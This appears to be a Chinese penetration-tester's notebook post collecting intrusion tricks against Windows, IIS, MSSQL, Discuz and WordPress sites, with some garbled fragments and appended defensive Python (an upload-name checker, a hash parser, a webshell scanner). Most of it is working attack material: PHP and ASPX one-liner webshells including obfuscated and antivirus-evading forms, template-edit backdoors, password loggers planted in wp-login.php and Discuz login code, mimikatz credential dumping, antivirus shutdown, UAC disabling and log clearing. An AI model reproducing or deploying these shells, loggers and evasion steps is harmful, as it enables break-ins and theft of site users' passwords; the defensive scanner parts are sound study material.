net start remoteaccess
FCKeditor upload form (Type=Media):
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
control userpasswords2  opens the advanced User Accounts dialog (it lets you reset passwords and toggle the logon prompt; it does not show existing passwords)
Exporting an Access database straight to a shell; requires that table a exists in the Access database and that you know the site's real path
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
141. When doing manual MSSQL injection without an out-of-band way to write data out, most people read the records out one at a time, which is tiring. Here is a statement that returns all the data in one go (FOR XML PATH needs SQL Server 2005 or later):
Test 1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

Test 2 (xp_dirtree 'c:\',1,1 returns subdirectory, depth and file columns, hence the three-column table):
create table dirs(paths varchar(100),paths1 varchar(100), id int)

delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--

SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
Shutting down McAfee: this needs SYSTEM rights, so run it via at or psexec -s cmd.exe
You can upload .com files, e.g. nc.com, to get around McAfee's restrictions on executables;
net stop mcafeeframework
net stop mcshield
net stop mcafeeengineservice
net stop mctaskmanager
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D

Attachment: VNCDump.zip (4.76 KB)
Online password cracking: http://tools88.com/safe/vnc.php
The VNC password can be dumped directly with vncdump, or read from the command line from the Password value under [HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4]. It is stored DES-obfuscated with a fixed key rather than hashed, so it is fully recoverable.
exec master..xp_cmdshell 'net user'
Running commands through MSSQL.
Query to get MSSQL password hashes (SQL Server 2000; on 2005 and later use sys.sql_logins as shown above):
select name,password from master.dbo.sysxlogins
backup log dbName with NO_LOG;
backup log dbName with TRUNCATE_ONLY;
DBCC SHRINKDATABASE(dbName);
Shrinking an MSSQL database (the NO_LOG and TRUNCATE_ONLY options were removed in SQL Server 2008; there you switch the database to the SIMPLE recovery model instead)

Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
Compresses game_db_201107170400.BAK into 1.rar split into 200 MB volumes (-m0 stores without compression, -ep1 drops the base directory from the paths).

backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
Backs up the game database to D:\WebSites\game.com\UpFileList\game.bak (a path under the web root, so the file can then be fetched over HTTP)
( a% p+ k$ o sDiscuz!nt35渗透要点:7 i( V$ `$ O2 S7 f- f4 @$ A
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
! o. f2 @* o5 {* A(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>8 k- Q: Y3 w! y8 a2 ^+ x
(3)保存。
: ]* r# F/ W7 M- V0 k6 L5 ~9 _# ](4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass6 ]8 P4 ]% k2 |/ _8 K( t
d:\rar.exe a -r d:\1.rar d:\website\( ]" _. r, C* J6 L
递归压缩website# K1 a6 e( z! g2 \
注意rar.exe的路径

<?php
$telok = "0${@eval($_POST[xxoo])}";
$username = "123456";
$userpwd = "123456";
$telhao = "123456";
$telinfo = "123456";
?>
PHP one-liner: unfiltered input lets a one-liner trojan be inserted (into the config values above)

Technique for dumping the database when the web server and database server are separate
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
When restrictions prevent uploading a full shell and you only have a one-liner, it is actually enough for anything you need, just not very direct or convenient, e.g. for dumping the database.
What is used here is the shell client's expert mode (writing the code yourself).
& A* x p& n: k6 t0 _3 i* pini_set('display_errors', 1);' q; u6 _+ m5 r0 N
set_time_limit(0);
9 g; t" F+ ]+ q- u- Q- derror_reporting(E_ALL);6 y) \# }& K$ M5 S
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());
) O1 V6 r# {9 e5 y9 Rmysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());- N R$ G+ i( F
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());8 e3 F/ ?. u/ E; |
$i = 0;
+ c. o# ^6 Z9 A, o$tmp = '';
% ?; y' v. E+ b# a5 N8 ~6 owhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {5 M4 ]: s! ?5 L5 ^' x: x$ K
$i = $i+1;
( A- ~5 C7 v/ t# p# ^* B $tmp .= implode("::", $row)."\n";
2 Q( i: S! X) a+ A if(!($i%500)){//500条写入一个文件6 C) H& Y c/ p3 m- W; c* A
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
1 R/ C7 W" O; v9 ] file_put_contents($filename,$tmp);
/ Z$ Z' T9 p$ X2 h $tmp = '';
5 o _- c$ ~0 }2 F. `; a2 \" [ }
+ E y/ [' z5 J5 {}
% O9 l B5 a j2 t" ^mysql_free_result($result);2 r6 o( o% @* c% @) ^
% X. I' \) g& h a# ]3 b; o
, Y8 ~& y K2 e7 P
I* X! g$ M8 m: k//down完后delete
# Y c6 u" D; f0 q! [+ Z6 U6 B/ x& G& z- [% i# s( l
4 v2 I. C& O- m) x0 W0 O% ~
ini_set('display_errors', 1);
9 J% G' W) |+ R' Yerror_reporting(E_ALL);- x# v7 `" L Z9 W
$i = 0;
# [+ l F( L8 Qwhile($i<32) {8 t0 |) [7 Z& Z* b. ]2 ]3 F
$i = $i+1;
) S* C- |% i6 W! Q' \$ i $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
0 O2 }# i% o& @% x7 X; |/ X$ e unlink($filename);
( g& A" o6 F6 K K}
httprint: collects operating system fingerprints
Scan all ports of 192.168.1.100:
nmap -PN -sT -sV -p0-65535 192.168.1.100
host -t ns www.owasp.org   identifies the name servers and gathers DNS information
host -l www.owasp.org ns1.secure.net   attempts a zone transfer for owasp.org
Netcraft's DNS search service: http://searchdns.netcraft.com/?host

Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (free registration required)

MSN search: http://search.msn.com syntax: "ip:x.x.x.x" (without the quotes)

Webhosting info: http://whois.webhosting.info/ syntax: http://whois.webhosting.info/x.x.x.x

DNSstuff: http://www.dnsstuff.com/ (several services available)

http://net-square.com/msnpawn/index.shtml (requires installation)
tomDNS: http://www.tomdns.net/ (some services are still non-public)

SEOlogs.com: http://www.seologs.com/ip-domains.html (reverse IP/domain lookup)
set names gb2312
Importing a database shows the error "Data too long for column 'username' at row 1". The cause is that Chinese characters are not supported.

Changing the MySQL password
UPDATE mysql.user SET password=PASSWORD("newpass") WHERE user="mysqladmin";
update user set password=PASSWORD('antian365.com') where user='root';
flush privileges;
Advanced PHP one-liner trojan backdoors

Many advanced PHP one-liner trojans were found during intrusions. They are recorded here so that they can later be searched for and removed by keyword.

1.
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$hh("/[discuz]/e",$_POST['h'],"Access");
// Caidao (China Chopper) one-liner

2.
$filename=$_GET['xbid'];
include ($filename);
// dangerous include: compiles and runs any file as PHP

3.
$reg="c"."o"."p"."y";
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
// renames (copies) any file

4.
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
$gzid("/[discuz]/e",$_POST['h'],"Access");
// Caidao one-liner

5. include ($uid);
// dangerous include: compiles and runs any file as PHP, fed via POST

// one-liner embedded in a gif
6. Typical one-liners

Program backdoor code
<?php eval_r($_POST[sb])?>
Program code
<?php @eval_r($_POST[sb])?>
// error-suppressed version
Program code
<?php assert($_POST[sb]);?>
// use the expert mode of lanker's one-liner client to execute the relevant PHP statements
Program code
<?$_POST['sa']($_POST['sb']);?>
Program code
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
Program code
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
// after using this, when configuring the connection in the Caidao one-liner client, enter the following in the "config" field
Program code
<O>h=@eval_r($_POST[c]);</O>
Program code
<script language="php">@eval_r($_POST[sb])</script>
// one-liner that bypasses the <? restriction

http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
Detailed usage:
1. Go to the tools directory. psexec \\127.0.0.1 cmd
2. Run mimikatz
3. Run privilege::debug
4. Run inject::process lsass.exe sekurlsa.dll
5. Run @getLogonPasswords
6. The wdigest entry is the password
7. Exit with exit; do not close the window directly, otherwise the system will crash.

http://www.monyer.com/demo/monyerjs/ fairly complete JS decoding site

Automatically check for critical system patches
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt

ASPX one-liner backdoor that gets past SafeDog
<%@ Page Language="C#" ValidateRequest="false" %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
Logging WordPress login passwords from a webshell
Logging WordPress login passwords from a webshell makes further social engineering easier.

Add the following at line 539 of wp-login.php:
// log password
$log_user=$_POST['log'];
$log_pwd=$_POST['pwd'];
$log_ip=$_SERVER["REMOTE_ADDR"];
$txt=$log_user.'|'.$log_pwd.'|'.$log_ip;
$txt=$txt."\r\n";
if($log_user&&$log_pwd&&$log_ip){
@fwrite(fopen('pwd.txt',"a+"),$txt);
}
The password-logging code is triggered when action=login; of course you can also put it in the default branch of the switch...case statement.
Just search for case 'login':
and insert it directly below; the recorded passwords are written to pwd.txt.
Actually, modifying wp-login.php is not a good approach; it is easily discovered. There are other methods; noting this for the record.
Using the IIS 6 file parsing vulnerability to bypass SafeDog:
;antian365.asp;antian365.jpg
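The defender's counterpart to the semicolon file name above, added here as an example that is not part of the original post: a small Python model of how IIS 6 picks a handler for a path (it cuts the file name at the first ';', and a directory segment named like a script file makes everything beneath it run with that engine), an allow-list check for upload names, a server-side renaming step, and an audit that flags names already on disk which IIS 6 would serve as script. The extension sets, function names and sample paths are constructed for this example.

```python
import os
import uuid

# Constructed lists for this example; align them with the handlers actually
# mapped on the server and with what the application is meant to accept.
SCRIPT_EXTENSIONS = {".asp", ".asa", ".cer", ".cdx", ".aspx", ".ashx", ".asmx"}
IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


def iis6_handler_extension(path):
    """Extension IIS 6 would use to choose a handler for `path`.

    Models the two parsing quirks: a directory segment named like a script
    (x.asp/logo.jpg) is served by that script engine, and the file name is cut
    at the first ';' (antian365.asp;antian365.jpg -> .asp).
    """
    parts = path.replace("\\", "/").split("/")
    for segment in parts[:-1]:
        ext = os.path.splitext(segment)[1].lower()
        if ext in SCRIPT_EXTENSIONS:
            return ext
    head = parts[-1].split(";", 1)[0]
    return os.path.splitext(head)[1].lower()


def upload_name_risk(name):
    """None when `name` may be stored under the web root, otherwise the reason."""
    if not name or "\x00" in name:
        return "empty name or NUL byte"
    if any(ch in name for ch in ";/\\"):
        return "separator character in file name"
    stem, ext = os.path.splitext(name)
    if "." in stem or not ext:
        return "missing or multiple extensions"
    if ext.lower() not in IMAGE_EXTENSIONS:
        return "extension %s is not allow-listed" % ext.lower()
    return None


def server_side_name(client_name):
    """Store uploads under a fresh name: only an allow-listed extension survives."""
    reason = upload_name_risk(client_name)
    if reason:
        raise ValueError(reason)
    return uuid.uuid4().hex + os.path.splitext(client_name)[1].lower()


def suspicious_upload_paths(paths):
    """Audit paths already on disk: flag names IIS 6 would hand to a script
    engine although their visible suffix looks harmless, and any name with ';'."""
    flagged = []
    for p in paths:
        last = p.replace("\\", "/").split("/")[-1]
        visible = os.path.splitext(last)[1].lower()
        served = iis6_handler_extension(p)
        if ";" in last or (served in SCRIPT_EXTENSIONS and visible not in SCRIPT_EXTENSIONS):
            flagged.append(p)
    return flagged


if __name__ == "__main__":
    # Constructed sample listing of an upload directory.
    for p in suspicious_upload_paths(["upload/;antian365.asp;antian365.jpg",
                                      "upload/logo.jpg", "upload/x.asp/logo.jpg"]):
        print("suspicious:", p)
```

The point of server_side_name is that the client's file name never reaches the file system at all, which removes every parsing trick at once; suspicious_upload_paths is for the upload directories that already exist.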

Grabbing hashes from various database types to crack the highest-privilege passwords
1. SQL Server 2000
SELECT password from master.dbo.sysxlogins where name='sa'
0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash
Crack the upper case hash in 'cain and abel' and then work on the case sensitive hash.

SQL Server 2005:
SELECT password_hash FROM sys.sql_logins where name='sa'
0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
0x0100 - constant header
993BF231 - salt
5F36CC441485B35C4D84687DC02C78B0E680411F - case sensitive hash
Crack the case sensitive hash in cain; try brute force and dictionary based attacks.

Update, following Bernardo's comments:
Use the function fn_varbintohexstr() to cast the password to a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password) from sysxlogins
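The field layout listed above, as an added example that is not part of the original post: Python that splits a stored hash into header, salt and SHA-1 fields, tells the two layouts apart by length, rebuilds the value from a known password and salt so that the "upper case hash" field is visibly SHA-1 over the UTF-16LE upper-cased password plus salt, and lists which logins still carry that legacy field. The two hash strings are the ones quoted above; the salt and login list in the usage are constructed.

```python
import binascii
import hashlib

HEADER = b"\x01\x00"   # the constant 0x0100 header from the listing above
SHA1_LEN = 20

# The two hash values quoted above, kept here so the parser can be checked on them.
PAGE_HASH_2000 = "0x010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A"
PAGE_HASH_2005 = "0x0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F"


def parse_mssql_hash(hex_string):
    """Split 0x0100 | 4-byte salt | SHA-1 [| SHA-1] into named fields.

    SQL Server 2000 stores two SHA-1 values (case-sensitive, then upper-cased);
    SQL Server 2005 keeps only the case-sensitive one.
    """
    text = hex_string.strip()
    if text[:2].lower() == "0x":
        text = text[2:]
    raw = binascii.unhexlify(text)
    if raw[:2] != HEADER:
        raise ValueError("unexpected header 0x%s" % raw[:2].hex())
    salt, body = raw[2:6], raw[6:]
    if len(body) == 2 * SHA1_LEN:
        version, case_hash, upper_hash = "2000", body[:SHA1_LEN], body[SHA1_LEN:]
    elif len(body) == SHA1_LEN:
        version, case_hash, upper_hash = "2005", body, None
    else:
        raise ValueError("unexpected length: %d bytes" % len(raw))
    return {
        "version": version,
        "salt": salt.hex().upper(),
        "case_sensitive_hash": case_hash.hex().upper(),
        "upper_case_hash": upper_hash.hex().upper() if upper_hash else None,
    }


def make_mssql_hash(password, salt, legacy=False):
    """Rebuild the stored value for a known password and 4-byte salt.

    Both layouts hash the UTF-16LE password followed by the salt; the SQL
    Server 2000 layout (legacy=True) appends a second SHA-1 over the
    upper-cased password, which is why that field is case-insensitive.
    """
    if len(salt) != 4:
        raise ValueError("salt must be 4 bytes")
    out = HEADER + salt + hashlib.sha1(password.encode("utf-16-le") + salt).digest()
    if legacy:
        out += hashlib.sha1(password.upper().encode("utf-16-le") + salt).digest()
    return "0x" + out.hex().upper()


def legacy_format_logins(rows):
    """Audit helper: names from (name, hash) rows whose stored hash still carries
    the SQL Server 2000 upper-case field and so deserves a password reset."""
    return [name for name, stored in rows if parse_mssql_hash(stored)["version"] == "2000"]


if __name__ == "__main__":
    for label, value in (("2000", PAGE_HASH_2000), ("2005", PAGE_HASH_2005)):
        print(label, parse_mssql_hash(value))
    # Constructed login list: which entries still use the legacy layout?
    print(legacy_format_logins([("sa", PAGE_HASH_2000), ("app", PAGE_HASH_2005)]))
```

The reason the upper-case field matters for a defender is that it halves the work for anyone who obtains the row, so logins whose hash is still in the 2000 layout after an upgrade should have their passwords reset so that SQL Server stores them in the newer form.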

MySQL:
In MySQL you can generate hashes internally using the password(), md5(), or sha1() functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql < 4.1

mysql> SELECT PASSWORD('mypass');
+--------------------+
| PASSWORD('mypass') |
+--------------------+
| 6f8c114b58f2ce9e   |
+--------------------+

*mysql >= 4.1
mysql> SELECT PASSWORD('mypass');
+-------------------------------------------+
| PASSWORD('mypass')                        |
+-------------------------------------------+
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
+-------------------------------------------+

Select user, password from mysql.user
The hashes can be cracked in 'cain and abel'.

Postgres:
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called "postgres" or "pgsql").
select usename, passwd from pg_shadow;
 usename  |               passwd
----------+-------------------------------------
 testuser | md5fabb6d7172aadfda4753bf0507ed4396
Use mdcrack to crack these hashes:
wine MDCrack-sse.exe --algorithm=MD5 --append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:
select name, password, spare4 from sys.user$
Hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g.
More on Oracle later, I am a bit bored....

Enabling xp_cmdshell in SQL Server 2005/2008
-- To allow advanced options to be changed.
EXEC sp_configure 'show advanced options', 1
GO
-- To update the currently configured value for advanced options.
RECONFIGURE
GO
-- To enable the feature.
EXEC sp_configure 'xp_cmdshell', 1
GO
-- To update the currently configured value for this feature.
RECONFIGURE
GO

Clearing SQL Server 2008 logs; always back up before clearing.
If SQL Express 2008 is installed on Windows Server 2008 Standard, delete this file:
X:\Users\[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin

For versions before SQL Server 2008:
SQL Server 2005:
Delete X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
SQL Server 2000:
Clear the corresponding entries under the registry key HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\.

This post was last edited by simeon on 2013-1-3 09:51

Windows 2008 file permission modification
1. http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
2. http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
I. First check whether the right-click menu has a "管理员取得所有权" (Take ownership as administrator) entry; if it does not:

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\*\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\*\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
[HKEY_CLASSES_ROOT\exefile\shell\runas2]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]
@="管理员取得所有权"
"NoWorkingDirectory"=""
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"

Import the Win7 right-click "管理员取得所有权" (Take ownership as administrator) .reg file.
II. Search the C:\Windows directory for "notepad.exe"; you should find four "notepad.exe" and four "notepad.exe.mui" files:
1. The "notepad.exe" under C:\Windows does not need to be replaced
2. The "notepad.exe" under C:\Windows\System32 does not need to be replaced
3. Leave the four "notepad.exe.mui" files alone
4. Mainly replace the "notepad.exe" in the two folders C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4 and
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a
To replace them, first take administrator ownership of the two folders, then rename "Notepad2.exe" to "notepad.exe" and copy it into both folders;
after replacing, return to the desktop, create a new txt file and open it to check whether it has changed.
Turning off the security policy in Windows 2008:
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Modify client.php in the uc_client directory; underneath
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
insert the code below; csslog.php is then generated automatically in the site's ./data/cache/ directory.
You can add a view.php under the ipdata directory to view the records; the password is: falw
if(getenv('HTTP_CLIENT_IP')) {
    $onlineip = getenv('HTTP_CLIENT_IP');
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
    $onlineip = getenv('HTTP_X_FORWARDED_FOR');
} elseif(getenv('REMOTE_ADDR')) {
    $onlineip = getenv('REMOTE_ADDR');
} else {
    $onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$showtime=date("Y-m-d H:i:s");
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
$handle=fopen('./data/cache/csslog.php','a+');
$write=fwrite($handle,$record);
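The one-liner list above is recorded, in the author's words, so the samples can later be found by keyword. As an added example that is not part of the original post, here is a Python sweep that turns the forms collected there, the wp-login.php password logger, this uc_client logger and the SafeDog ASPX loader into signatures and runs them over constructed sample files. The rule labels, helper names and sample contents are constructed for this example; the eval_r spelling is kept because that is how the samples appear in the list. The one-hop include rule catches $filename=$_GET['xbid']; include($filename); but not the bare include($uid) of sample 5, which needs real data-flow analysis rather than a regex.

```python
import re

# Signature set constructed from the backdoor forms collected on this page; a
# starting point for a keyword sweep, not a vendor rule set.
REGEX_RULES = [
    ("eval/assert on request input",            # eval_r: the spelling used in the samples
     r"\b(?:eval(?:_r)?|assert)\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    ("eval inside ${...} string interpolation", r"\$\{\s*@?eval\s*\("),
    ("preg_replace with /e modifier",
     r"preg_replace\s*\(\s*[\"']/[^\"']*/[a-z]*e[a-z]*[\"']"),
    ("request parameter called as a function", r"\$_(?:POST|GET|REQUEST)\s*\[[^\]]*\]\s*\("),
    ("include of request-controlled path",
     r"\b(?:include|require)(?:_once)?\s*\(?\s*\$_(?:GET|POST|REQUEST)"),
    ("<script language=php> tag", r"<script\s+language\s*=\s*[\"']php[\"']"),
    ("ASPX Assembly.Load of request body", r"Assembly\.Load\s*\(\s*Request\.BinaryRead"),
    ("a .php file opened for appending", r"fopen\s*\(\s*[\"'][^\"']*\.php[\"']\s*,\s*[\"']a\+?[\"']"),
    ("log file guarded by <?exit();?>", r"^<\?exit\(\);\?>"),
]
COMPILED = [(label, re.compile(p, re.I | re.M)) for label, p in REGEX_RULES]

# Names worth flagging when a script stores them in a variable to call later.
DANGEROUS = ("eval", "assert", "preg_replace", "copy", "system", "exec",
             "shell_exec", "passthru", "move_uploaded_file")
# "p"."r"."e"."g" ... : chains of one-character string literals joined with '.'
CONCAT = re.compile(r"""(?:["'][^"'\\]["']\s*\.\s*){2,}["'][^"'\\]["']""")
# $x("/.../e", $_POST[...]) : the /e pattern handed to a variable function
VARFUNC_E = re.compile(r"\$\w+\s*\(\s*[\"']/[^\"']*/e[\"']\s*,\s*\$_(?:POST|GET|REQUEST)", re.I)
ASSIGN_FROM_REQUEST = re.compile(r"\$(\w+)\s*=\s*\$_(?:GET|POST|REQUEST|COOKIE)\b")
PASSWORD_PARAM = re.compile(r"\$_POST\s*\[\s*[\"']?(?:pwd|password)[\"']?\s*\]", re.I)
FILE_WRITE = re.compile(r"\b(?:fwrite|fputs|file_put_contents)\s*\(")


def fold_concatenations(src):
    """Turn "p"."r"."e"."g" into "preg" so the name check below sees the real word."""
    return CONCAT.sub(
        lambda m: '"' + "".join(re.findall(r"[\"']([^\"'\\])[\"']", m.group(0))) + '"', src)


def scan_source(src):
    """Return the sorted list of rule labels that fire on one file's contents."""
    found = {label for label, rx in COMPILED if rx.search(src)}
    folded = fold_concatenations(src)
    for name in DANGEROUS:
        if re.search(r"\$\w+\s*=\s*[\"']%s[\"']" % name, folded, re.I):
            found.add("dangerous function name held in a string: " + name)
    if VARFUNC_E.search(src):
        found.add("variable function called with /e pattern on request input")
    for var in set(ASSIGN_FROM_REQUEST.findall(src)):   # one hop: $v = $_GET[..]; include($v);
        if re.search(r"\b(?:include|require)(?:_once)?\s*\(?\s*\$%s\b" % re.escape(var), src):
            found.add("include of request-controlled path")
    if PASSWORD_PARAM.search(src) and FILE_WRITE.search(src):
        found.add("request password written to a file")
    return sorted(found)


def scan_files(files):
    """files: {name: contents}. Returns only the entries that have findings."""
    report = {}
    for name, src in files.items():
        hits = scan_source(src)
        if hits:
            report[name] = hits
    return report


# Constructed sample files assembled from the forms listed on this page.
SAMPLES = {
    "concat_preg_e.php": '<?php $hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; $hh("/[discuz]/e",$_POST[\'h\'],"Access"); ?>',
    "include_get.php": "<?php $filename=$_GET['xbid']; include ($filename); ?>",
    "copy_concat.php": '<?php $reg="c"."o"."p"."y"; $reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]); ?>',
    "assert_post.php": "<?php assert($_POST[sb]);?>",
    "varfunc.php": "<?$_POST['sa']($_POST['sb']);?>",
    "preg_e.php": '<?php @preg_replace("/[email]/e",$_POST[\'h\'],"error"); ?>',
    "script_tag.php": '<script language="php">@eval_r($_POST[sb])</script>',
    "interp.php": '<?php $telok = "0${@eval($_POST[xxoo])}"; ?>',
    "wp-login.php": "<?php $log_pwd=$_POST['pwd']; $txt=$log_user.'|'.$log_pwd; @fwrite(fopen('pwd.txt','a+'),$txt); ?>",
    "client.php": "<?php $handle=fopen('./data/cache/csslog.php','a+'); fwrite($handle,$record); ?>",
    "csslog.php": "<?exit();?>用户:admin 密码:x IP:1.2.3.4\r\n",
    "rss.aspx": '<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["k"].Value))).CreateInstance("c"); } catch { }%>',
    "clean.php": "<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>",
}

if __name__ == "__main__":
    for name, hits in scan_files(SAMPLES).items():
        print(name, "->", "; ".join(hits))
```

To sweep a real document root, build the dictionary from disk, for example scan_files({p: open(p, errors="replace").read() for p in paths}), and treat every hit as something to read by hand: the concatenation and /e rules rarely fire on legitimate code, while the append-to-.php and include rules will also surface sloppy but benign code.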